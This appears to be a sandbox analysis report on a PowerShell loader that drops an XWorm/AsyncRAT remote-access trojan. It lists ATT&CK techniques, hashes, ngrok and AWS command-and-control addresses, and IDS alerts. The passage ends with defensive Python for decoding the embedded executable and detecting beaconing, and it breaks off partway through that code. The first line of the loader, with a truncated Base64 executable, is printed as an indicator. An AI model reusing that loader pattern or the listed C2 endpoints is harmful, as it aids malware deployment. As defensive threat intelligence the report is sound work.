Source: Yara match; File source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: tmpB20E.exe PID: 7928, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPED
MITRE ATT&CK Matrix (highlighted cells only; the unhighlighted template cells of the matrix are omitted, and the number after each technique is the count badge as rendered in the report)

Execution: Windows Management Instrumentation (11); PowerShell (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (11); DLL Side-Loading (1)
Defense Evasion: Disable or Modify Tools (1); Virtualization/Sandbox Evasion (131); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (3); DLL Side-Loading (1)
Discovery: Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (13)
Collection: Archive Collected Data (11)
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (1)
No techniques are highlighted under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Behavior Graph (ID 1602905; sample 20f8b1d9eabf499dbc7a0bff6ee...; start date 30/01/2025; architecture WINDOWS; score 100)

Top level: DNS/IP nodes 2.tcp.eu.ngrok.io and 171.39.242.20.in-addr.arpa; signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures.
powershell.exe (started from the sample): dropped C:\Users\user\AppData\Local\...\tmpB20E.exe (PE32); signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file; started tmpB20E.exe and conhost.exe.
tmpB20E.exe: connections to 3.127.138.57 (ports 10901, 57576, 57605; AMAZON-02, US) and 18.157.68.73 (ports 10901, 57656, 57657; AMAZON-02, US), plus 3 other IPs or domains; 10901 is the remote port, the 57xxx values are the client's ephemeral source ports. Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file.

Antivirus and ML detection results

Submitted file (Source | Detection | Scanner | Label):
20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1 | 22% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT

Dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Temp\tmpB20E.exe | 100% | Avira | HEUR/AGEN.1305769
C:\Users\user\AppData\Local\Temp\tmpB20E.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\tmpB20E.exe | 72% | Virustotal | -

No Antivirus matches (reported for each of the three remaining detection tables)


Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
2.tcp.eu.ngrok.io | 3.126.37.18 | true | false | - | high
171.39.242.20.in-addr.arpa | unknown | unknown | false | - | high

ngrok is a legitimate tunnel broker, which is why its hostname and edge IP carry a high reputation and a non-malicious verdict even though this sample resolves them. The durable indicator is the <n>.tcp.<region>.ngrok.io hostname shape together with the 10901/tcp destination port seen in the behavior graph, not the shared edge IP, which is reassigned between tunnels.
URLs found in process memory (Name | Source | Malicious | Antivirus Detection | Reputation):
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1368287437.000001E4101E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1368287437.000001E410081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1368287437.000001E4101E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1368287437.000001E410081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://oneget.orgX | powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1351823605.000001E400001000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1351823605.000001E400001000.00000004.00000800.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3784517191.0000000003191000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://oneget.org | powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmp | false | - | high

None of these URLs is flagged. They are strings from the PackageManagement/PowerShellGet and Pester module metadata bundled with PowerShell (nuget.org, oneget.org, github.com/Pester, the contoso.com placeholders), from PowerShell's own startup banner (aka.ms/pscore6) and from the .NET runtime (the schemas.xmlsoap.org claim type), resident in process memory rather than infrastructure contacted by the sample.
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
3.126.37.18 | 2.tcp.eu.ngrok.io | United States | US | 16509 | AMAZON-02 | false
3.127.138.57 | unknown | United States | US | 16509 | AMAZON-02 | true
18.192.93.86 | unknown | United States | US | 16509 | AMAZON-02 | false
18.157.68.73 | unknown | United States | US | 16509 | AMAZON-02 | false
18.197.239.5 | unknown | United States | US | 16509 | AMAZON-02 | false
                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1602905
                                            Start date and time:2025-01-30 10:34:10 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 1s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes:10
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winPS1@4/6@6/5
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 52
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .ps1
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 20.242.39.171, 20.12.23.50
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 7700 because it is empty
                                            • Execution Graph export aborted for target tmpB20E.exe, PID 7928 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:35:17 | API Interceptor | 4x Sleep call for process: powershell.exe modified
04:35:21 | API Interceptor | 14227572x Sleep call for process: tmpB20E.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3.126.37.18 | mod.exe | malicious | Njrat |
3.126.37.18 | Server.exe | malicious | Njrat |
3.126.37.18 | oiA5KmV0f0.exe | malicious | Njrat |
3.126.37.18 | fBpY1pYq34.exe | malicious | Njrat |
3.126.37.18 | f3aef511705f37f9792c6032b936ca61.exe | malicious | Njrat |
3.126.37.18 | W9UAjNR4L6.exe | malicious | Njrat |
3.126.37.18 | 7zFM.exe | malicious | ZTrat |
3.126.37.18 | 4xKDL5YCfQ.exe | malicious | Njrat |
3.126.37.18 | b8UsrDOVGV.exe | malicious | Njrat |
3.126.37.18 | tiodtk2cfy.exe | malicious | Njrat |
3.127.138.57 | mod.exe | malicious | Njrat |
3.127.138.57 | Server.exe | malicious | Njrat |
3.127.138.57 | Discord.exe | malicious | AsyncRAT |
3.127.138.57 | f3aef511705f37f9792c6032b936ca61.exe | malicious | Njrat |
3.127.138.57 | En3e396wX1.exe | malicious | Njrat |
3.127.138.57 | ea1Wv7aq.posh.ps1 | malicious | Metasploit |
3.127.138.57 | R3ov8eFFFP.exe | malicious | Njrat |
3.127.138.57 | b8UsrDOVGV.exe | malicious | Njrat |
3.127.138.57 | 2G8CgDVl3K.exe | malicious | Njrat |
3.127.138.57 | tiodtk2cfy.exe | malicious | Njrat |
18.192.93.86 | P90GT_Invoice_Related_Property_Tax_P800.exe | malicious | RedLine | 2.tcp.eu.ngrok.io:17685/
18.192.93.86 | http://www.sdrclm.cn/vendor/phpdocumentor/P800/P90GT_Invoice_Related_Property_Tax_P800.exe | malicious | RedLine | 2.tcp.eu.ngrok.io:17685/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
2.tcp.eu.ngrok.io | mod.exe | malicious | Njrat | 18.157.68.73
2.tcp.eu.ngrok.io | Server.exe | malicious | Njrat | 3.127.138.57
2.tcp.eu.ngrok.io | Discord.exe | malicious | AsyncRAT | 18.156.13.209
2.tcp.eu.ngrok.io | oiA5KmV0f0.exe | malicious | Njrat | 3.126.37.18
2.tcp.eu.ngrok.io | 7166_output.vbs | malicious | AsyncRAT | 18.156.13.209
2.tcp.eu.ngrok.io | fBpY1pYq34.exe | malicious | Njrat | 18.157.68.73
2.tcp.eu.ngrok.io | f3aef511705f37f9792c6032b936ca61.exe | malicious | Njrat | 3.126.37.18
2.tcp.eu.ngrok.io | W9UAjNR4L6.exe | malicious | Njrat | 3.126.37.18
2.tcp.eu.ngrok.io | ULNZPn6D33.exe | malicious | Sliver | 18.197.239.5
2.tcp.eu.ngrok.io | Injector.exe | malicious | ZTrat | 18.197.239.5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02 (US) | fabd6ab15a0540d197f1ceaa312308b8.ps1 | malicious | CobaltStrike, Metasploit | 3.17.10.250
AMAZON-02 (US) | 1.vbs | malicious | CobaltStrike, Metasploit | 3.17.10.250
AMAZON-02 (US) | m68k.elf | malicious | Mirai | 54.171.230.55
AMAZON-02 (US) | SOA OF DEC 2024 PT.BINEX.exe | malicious | FormBook | 13.248.169.48
AMAZON-02 (US) | https://l.ead.me/bfibh8/?1778990567JHGFBVDFS56678 | malicious | HTMLPhisher | 3.161.119.33
AMAZON-02 (US) | SERVED SUMMON LETTER 01-30-2025.pdf | malicious | HTMLPhisher | 13.248.243.5
AMAZON-02 (US) | contract update.exe | malicious | FormBook | 13.248.169.48
AMAZON-02 (US) | Updated 2025 Trading Agreement for Direct Purchase account.exe | malicious | FormBook | 13.248.169.48
AMAZON-02 (US) | Bank Slip pdf.exe | malicious | FormBook | 13.248.169.48
AMAZON-02 (US) | SWIFT COPY.exe | malicious | FormBook | 13.248.169.48
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1628158735648508
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nllluldhz/lL:NllU
                                                                                    MD5:03744CE5681CB7F5E53A02F19FA22067
                                                                                    SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                                                    SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                                                    SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:@...e.................................L..............@..........
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33280
                                                                                    Entropy (8bit):5.595778394593736
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:xlRmhGD91SluSWhnHHxzLmYV3Tm2eaFOL1dRApkFTBLTsOZwpGd2v99IkuisfVFR:TRPD9OQhx/BV3Tw4e1dVFE9jSOjhwb7
                                                                                    MD5:F5302ED0307CE30D226D50A45A0DCA9D
                                                                                    SHA1:9C9F6BA6ED092FFDCECF6DE13E9E618CE26FF2F5
                                                                                    SHA-256:497F32EB65C30742069CE49A41270EAB82D3A5CD1E36958E3608304F53507A0F
                                                                                    SHA-512:0E9DFE2087B9E76B6504C26ACA0C13CAF72BBD459F1ACA1439805D8CE5D2A554DF8143818F984F526D64BDE4EA271CD87BEF9E0446822E64C063369C10DA5B92
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: Joe Security
                                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: Sekoia.io
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: Virustotal, Detection: 72%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.g.................x............... ........@.. ....................................@.................................D...W.................................................................................... ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H.......,O...H............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6225
                                                                                    Entropy (8bit):3.733655320231587
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:W/S2W0bHCXU20MQzukvhkvklCywi98ijYIl6TsSogZowJAJad8ijYIllTsSogZog:eWsHCEr5ykvhkvCCtBcYI2JHycYIDJH9
                                                                                    MD5:16C804C6915EAB8CC5392F1CDE971F51
                                                                                    SHA1:FF803AF50F33F76DA0CC5490A94930DAF5226AA6
                                                                                    SHA-256:1729C7146E6529EA756E2392FDE80C3A2188D596122D92A39EBF56A10C04C639
                                                                                    SHA-512:7F317726577BAA7ED5F5ED0C559579E3E52AA3A2353EA9E5466BCB36BE469F6520981280C4624EAC4F760C5EF8085C1923626063EB13AABB0FF74447A50B93F3
                                                                                    Malicious:false
                                                                                    Preview:...................................FL..................F.".. .....*_...%.iD.r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......?.r....D.r......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=>ZgL..........................3*N.A.p.p.D.a.t.a...B.V.1.....>ZdL..Roaming.@......EW.=>ZdL..........................F.'.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=>ZbL..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=>ZbL..........................f.i.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=>ZbL....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=>ZbL....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=>ZhL....9...........
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6225
                                                                                    Entropy (8bit):3.733655320231587
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:W/S2W0bHCXU20MQzukvhkvklCywi98ijYIl6TsSogZowJAJad8ijYIllTsSogZog:eWsHCEr5ykvhkvCCtBcYI2JHycYIDJH9
                                                                                    MD5:16C804C6915EAB8CC5392F1CDE971F51
                                                                                    SHA1:FF803AF50F33F76DA0CC5490A94930DAF5226AA6
                                                                                    SHA-256:1729C7146E6529EA756E2392FDE80C3A2188D596122D92A39EBF56A10C04C639
                                                                                    SHA-512:7F317726577BAA7ED5F5ED0C559579E3E52AA3A2353EA9E5466BCB36BE469F6520981280C4624EAC4F760C5EF8085C1923626063EB13AABB0FF74447A50B93F3
                                                                                    Malicious:false
                                                                                    Preview:...................................FL..................F.".. .....*_...%.iD.r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......?.r....D.r......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=>ZgL..........................3*N.A.p.p.D.a.t.a...B.V.1.....>ZdL..Roaming.@......EW.=>ZdL..........................F.'.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=>ZbL..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=>ZbL..........................f.i.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=>ZbL....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=>ZbL....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=>ZhL....9...........
                                                                                    File type:ASCII text, with very long lines (44431), with CRLF line terminators
                                                                                    Entropy (8bit):4.9578052016755425
                                                                                    TrID:
                                                                                      File name:20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1
                                                                                      File size:45'430 bytes
                                                                                      MD5:ac45d57d6196e0eb21f4136002fd645d
                                                                                      SHA1:d3d32e7473079db2dbbf959c887a16e87a22894c
                                                                                      SHA256:52f1718467ed6617713e995fb1ad595f9040247df74acb489285a00212f7ff7d
                                                                                      SHA512:8ce3075dff3468f72b199b07b87b328c727fd2c9eb0b6ef6d0709040069b5261ce60afae1a24c5cc2a401eb359c4b04011b56f50e4f521ef7ee0337520f6c11e
                                                                                      SSDEEP:768:rqd0pgY5FOZdrLIIz+YrZJLlNeDGjR5TGcygxl92eeG:u2SxdrLII+0XhLjHGcyulkeeG
                                                                                      TLSH:7A135A374922FCD1BB7F2D90F5043A651C88342787A98678FBC4095A38B6250DF6ADF8
                                                                                      File Content Preview:..$arquivo_bytes = [System.Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADHMkmcAAAAAAAAAAOAA
                                                                                      Icon Hash:3270d6baae77db44
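The File Content Preview above shows what this .ps1 is: a loader that assigns a Base64 literal beginning with TVqQ, the encoding of an MZ header, to $arquivo_bytes, so the PE is carried inside the script as a string. The Python below is an added triage example, not code from the report or from the sample. It takes the preview text exactly as printed above (the report keeps only the first 200 Base64 characters, so only the DOS header and the first 18 bytes of the COFF header decode), extracts and decodes the FromBase64String argument, and reads the fields a first pass wants: e_lfanew, machine, section count, compile timestamp and optional-header size. The variable name $arquivo_bytes is the sample's own; the function names, the min_chars threshold and the truncation handling are mine.

```python
# Added triage example, not code from the report or from the sample.  It takes
# the PowerShell line shown in "File Content Preview" above, pulls out the
# FromBase64String argument, decodes it and reads the PE headers.  PREVIEW is
# copied from the report; the report keeps only the first 200 Base64 characters,
# so only the DOS header and the first 18 bytes of the COFF header decode.
import base64
import re
import struct
from datetime import datetime, timezone

PREVIEW = (
    "$arquivo_bytes = [System.Convert]::FromBase64String('"
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADHMkmcAAAAAAAAAAOAA"
)

# FromBase64String('...') with the literal captured; a truncated preview simply
# ends mid-string, so the closing quote is not required.
B64_CALL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/]+={0,2})", re.IGNORECASE)


def extract_base64_blobs(script, min_chars=64):
    """Decode every FromBase64String literal of at least min_chars characters.
    Truncated literals are trimmed/padded to a multiple of four so the leading
    bytes still decode."""
    blobs = []
    for m in B64_CALL.finditer(script):
        s = m.group(1)
        if len(s) < min_chars:
            continue
        if len(s) % 4 == 1:          # a lone trailing character carries no whole byte
            s = s[:-1]
        s += "=" * (-len(s) % 4)
        blobs.append(base64.b64decode(s))
    return blobs


def pe_summary(data):
    """Read the DOS and COFF headers.  Returns None if data is not an MZ image;
    fields past the end of a truncated buffer are simply absent."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    info = {
        "e_lfanew": e_lfanew,
        "dos_stub": b"This program cannot be run in DOS mode" in data,
        "pe": False,
    }
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (18 bytes after the 4-byte signature)
    if len(data) >= e_lfanew + 22 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
        machine, nsect, stamp, _, _, opt = struct.unpack_from("<HHIIIH", data, e_lfanew + 4)
        info.update(
            pe=True,
            machine=machine,                      # 0x14C = i386, 0x8664 = x64
            sections=nsect,
            timestamp=stamp,
            compiled_utc=datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
            optional_header_size=opt,             # 0xE0 = PE32, 0xF0 = PE32+
        )
    return info


def triage(script):
    """Return the header summary of every embedded PE found in a script."""
    return [s for s in (pe_summary(b) for b in extract_base64_blobs(script)) if s]


if __name__ == "__main__":
    for entry in triage(PREVIEW):
        print(entry)
```

On the preview above this reports e_lfanew 0x80, machine 0x14C (i386), three sections, SizeOfOptionalHeader 0xE0 (PE32) and a TimeDateStamp of 2025-01-23T23:09:37Z, one week before the analysis date. The check does not depend on the variable name: the indicator is a Base64 literal of tens of kilobytes whose first bytes decode to MZ, which is the same pattern whatever the script calls it.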


Timestamp                        SID      Signature                                                  Severity  Source IP    Source Port  Dest IP       Dest Port  Protocol
2025-01-30T10:36:31.828608+0100  2855924  ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound   1         192.168.2.7  57652        3.127.138.57  10901      TCP
2025-01-30T10:36:48.589330+0100  2853193  ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound   1         192.168.2.7  57655        3.127.138.57  10901      TCP
                                                                                      • Total Packets: 303
• 10901 (unregistered port; carries the XWorm C2 traffic flagged by the Suricata alerts above)
                                                                                      • 53 (DNS)
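The alerts above fire on XWorm's PING command, but the flow table that follows shows a traffic shape that is visible even without a content signature: the client opens a fresh TCP connection to 3.126.37.18:10901 roughly every four seconds, exchanges one request and one response (the reply arrives about 1.6 s after the request), and the connection is torn down as the next one opens; after the DNS exchange with 162.159.36.2 at 10:35:48 the same pattern continues against 3.127.138.57:10901, with the interval shrinking from about 4 s to under 2 s. The Python below is an added example, not part of the report. It groups packets into connections, measures the gaps between connection starts per (client, server, port), and applies two rules: a regularity test (low coefficient of variation) that catches the first phase, and a connection-churn test that also catches the second phase, whose drifting interval defeats the regularity test. The FLOWS rows are copied from the table below (the first connection packet by packet, the others by their first packet); the function names and thresholds are mine.

```python
# Added example (not part of the Joe Sandbox report): beaconing check over the
# TCP flow records from the network table.  Rows are copied from that table as
# (timestamp, src port, dst port, src ip, dst ip); only the first connection is
# reproduced packet by packet, the others by their first packet (the SYN).
from collections import defaultdict
from statistics import mean, pstdev

FLOWS = [
    # first C2 connection to 3.126.37.18:10901, packet by packet
    ("10:35:21.990950108", 49725, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:21.997144938", 10901, 49725, "3.126.37.18", "192.168.2.7"),
    ("10:35:21.997221947", 49725, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:22.240994930", 49725, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:22.245821953", 10901, 49725, "3.126.37.18", "192.168.2.7"),
    ("10:35:23.613183022", 10901, 49725, "3.126.37.18", "192.168.2.7"),
    ("10:35:23.613331079", 49725, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:26.229598045", 49725, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:26.231295109", 49752, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:26.234390020", 10901, 49725, "3.126.37.18", "192.168.2.7"),  # late packet on the old connection
    # first packet of each further connection to 3.126.37.18:10901
    ("10:35:30.126604080", 49780, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:34.654441118", 49808, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:38.528335094", 49834, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:42.902971983", 49865, 10901, "192.168.2.7", "3.126.37.18"),
    ("10:35:47.297401905", 49891, 10901, "192.168.2.7", "3.126.37.18"),
    # DNS to 162.159.36.2, after which the C2 endpoint changes to 3.127.138.57
    ("10:35:48.943802118", 57556, 53, "192.168.2.7", "162.159.36.2"),
    ("10:35:48.948596001", 53, 57556, "162.159.36.2", "192.168.2.7"),
    ("10:35:51.644072056", 57576, 10901, "192.168.2.7", "3.127.138.57"),
    ("10:35:55.731884956", 57605, 10901, "192.168.2.7", "3.127.138.57"),
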